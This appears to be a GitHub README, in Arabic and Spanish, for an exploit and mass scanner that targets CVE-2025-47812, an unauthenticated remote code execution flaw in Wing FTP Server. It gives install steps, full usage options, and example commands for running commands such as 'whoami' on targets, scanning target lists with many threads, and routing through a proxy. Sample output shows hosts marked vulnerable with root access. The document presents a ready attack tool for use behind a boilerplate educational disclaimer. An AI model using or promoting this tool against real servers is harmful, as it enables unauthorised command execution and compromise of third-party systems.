
استغلال وماسح ضوئي لـ CVE-2025-47812 يستهدف تنفيذ الأكواد عن بُعد غير المصادق عليه في خادم Wing FTP، مع دعم الأهداف الفردية، والمسح الشامل، والوكيل، وتنسيقات إخراج متعددة.
استغلال محسّن لخادم Wing FTP CVE-2025-47812 - تنفيذ التعليمات البرمجية عن بعد دون مصادقة (RCE)
قم باستنساخ هذا المستودع وادخل إلى الدليل:
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
أو ببساطة قم بتنزيل السكربت CVE-2025-47812.py وقم بتشغيله.
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Exploit para Wing FTP Server CVE-2025-47812 - versión mejorada
opciones:
-h, --help muestra este mensaje
-u URL, --url URL URL objetivo (ej. http://192.168.1.100:5466)
-f FILE, --file FILE archivo con lista de URLs (una por línea)
-c COMMAND, --command COMMAND
comando a ejecutar (por defecto: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
nombre de usuario (default: anonymous)
-P PASSWORD, --password PASSWORD
contraseña (default: vacía)
--check modo verificación: solo comprueba si es vulnerable (usa comando inocuo)
-v, --verbose modo verbose (muestra detalles)
--proxy PROXY proxy (ej. http://127.0.0.1:8080)
--timeout TIMEOUT timeout en segundos (default: 10)
-o OUTPUT, --output OUTPUT
archivo de salida para guardar resultados
--output-format {txt,json,csv}
formato de salida (default: txt)
--threads THREADS número de hilos para escanear múltiples objetivos (default: 5)
--no-progress ocultar barra de progreso
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
يجب أن يحتوي الملف على عنوان URL واحد لكل سطر، على سبيل المثال:
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
http://192.168.1.10:5466 - VULNERABLE - usuario: root
http://192.168.1.11:5466 - SEGURO - No vulnerable
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "usuario: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuario: root
هذا الاستغلال مصمم للأغراض التعليمية فقط واختبارات الأمن المصرح بها. الاستخدام غير المصرح به لهذه الأداة ضد أنظمة دون موافقة صريحة غير قانوني وقد يؤدي إلى عواقب قانونية خطيرة. لا يتحمل المؤلفون المسؤولية عن أي سوء استخدام قد يحدث.
إذا أعجبك هذا العمل، لا تنسى منحه نجمة ⭐ على GitHub!
هذا المشروع مرخص بموجب رخصة MIT – راجع ملف LICENSE لمزيد من التفاصيل.